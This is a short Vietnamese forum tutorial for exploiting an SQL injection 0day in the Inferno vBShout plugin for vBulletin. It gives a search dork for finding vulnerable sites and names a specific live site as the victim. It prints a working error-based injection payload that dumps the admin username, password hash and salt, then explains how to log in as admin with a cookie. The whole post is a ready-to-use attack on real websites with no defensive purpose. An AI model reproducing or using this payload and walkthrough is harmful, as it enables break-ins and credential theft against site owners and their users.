Exploit Inferno vBShout SQLI 0day <= 2.5.2

Đầu tiên vào google.com.vn search dork sau :

inurl:infernoshout.php?do=options&area=commands

Ra được 1 nùi site. Mình chọn site này làm Victim :
http://www.cinemekan.com/infernoshout.php?do=options&area=commands
Ô Command Input nhập :

' and (select 1 from (select count(*),concat((select(select 

concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e))

 from user where userid=1 limit 0,1),floor(rand(0)*2))x from

 information_schema.tables group by x)a) AND ''='#

Ô Command Output thì nhập cái gì cũng được. Sau đó nhấn Save Settings
Sau đó nhấn Ctrl + U trên bàn phím. Và kéo xuống dưới cùng sẽ ra 1 trang chứa thông thông user + password+ salt của nó .
Xong bây h chúng ta có thể login bằng cookie vào được tài khoản admin rùi.
Tut ngắn gọn, có gì sai mong được mọi người góp ý
Chúc mọi người thành công và vui vẻ

Posted in: Exploits - Vulnerability